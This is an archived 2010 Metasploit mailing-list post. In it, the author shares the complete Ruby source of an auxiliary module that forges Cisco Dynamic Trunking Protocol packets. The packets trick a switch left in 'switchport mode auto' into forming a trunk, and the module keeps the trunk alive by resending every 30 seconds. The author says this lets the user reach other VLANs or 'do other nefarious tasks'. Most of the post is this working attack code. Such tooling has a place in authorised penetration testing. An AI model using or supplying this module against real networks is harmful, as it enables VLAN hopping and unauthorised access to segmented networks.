Metasploit mailing list archives
Dynamic Trunk Protocol (DTP) Module
From: Spencer McIntyre <zerosteiner () gmail com>
Date: Thu, 08 Jul 2010 23:24:52 -0700
I have written a module for Metasploit that will forge DTP packets to negotiate a trunk with a Cisco switch that has been improperly configured with the "switchport mode auto" setting. This module, although not significant in itself, places the user in a position to add a 802.1Q interface onto their system and access another network or do other nefarious tasks. It might be worth while to also mention that this is not exploiting a flaw within IOS but a feature. I am currently testing a PVSTP+ module I have also written that works well in conjunction with this DTP module.
By default this module runs in the background and periodically sends a DTP packet to keep the trunk connection alive. I hope someone else finds this useful.
Spencer McIntyre zeroSteiner () gmail com #begin auxiliary/spoof/cisco/dtp.rb require 'msf/core' require 'racket' class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Forge DTP Packets', 'Description' => %q{ This module forges DTP packets to initialize a trunk port. }, 'Author' => [ 'Spencer McIntyre' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 7 $', 'Actions' => [ [ 'Service' ] ], 'PassiveActions' => [ 'Service' ], 'DefaultAction' => 'Service' )) register_options([ OptString.new('DOMAIN', [ false, "DTP Domain Name", '']), OptString.new('IFACE', [ true, "Interface To Use", 'eth0']), ], self.class) end def run n = Racket::Racket.new @run = true domain = datastore['DOMAIN'] if domain == "" domain = "\x00\x00\x00\x00\x00\x00\x00\x00\x00" end n.l2 = Racket::L2::Ethernet.new() n.l2.dst_mac = '01:00:0c:cc:cc:cc' #this has to stay the same n.l2.ethertype = (domain.length + 34) n.l3 = Racket::L2::LLC.new() n.l3.control = 0x03 n.l3.dsap = 0xaa n.l3.ssap = 0xaa cisco_vendor_code = "\x00\x00\x0c" pid = "\x20\x04" #2004 is DTP n.l3.payload = cisco_vendor_code + pid #DTP info section dtp_version = "\x01" dtp_domain_type = "\x00\x01" dtp_domain_len = [ (domain.length + 5) ].pack("n") dtp_domain = domain + "\x00" dtp_domain_section = dtp_domain_type + dtp_domain_len + dtp_domain dtp_status_type = "\x00\x02" dtp_status_len = "\x00\x05" dtp_status = "\x03" dtp_status_section = dtp_status_type + dtp_status_len + dtp_status dtp_type_type = "\x00\x03" dtp_type_len = "\x00\x05" dtp_type = "\xa5" dtp_type_section = dtp_type_type + dtp_type_len + dtp_type dtp_neighbor_type = "\x00\x04" dtp_neighbor_len = "\x00\x0a" dtp_neighbor = "\x11\x22\x33\x44\x55\x66"dtp_neighbor_section = dtp_neighbor_type + dtp_neighbor_len + dtp_neighbor
n.l3.payload += dtp_version + dtp_domain_section + dtp_status_section + dtp_type_section + dtp_neighbor_section
n.iface = datastore['IFACE'] n.pack() while @run n.send2() select(nil, nil, nil, 30) end end end _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Dynamic Trunk Protocol (DTP) Module Spencer McIntyre (Jul 08)
- Re: Dynamic Trunk Protocol (DTP) Module Jon Hart (Jul 09)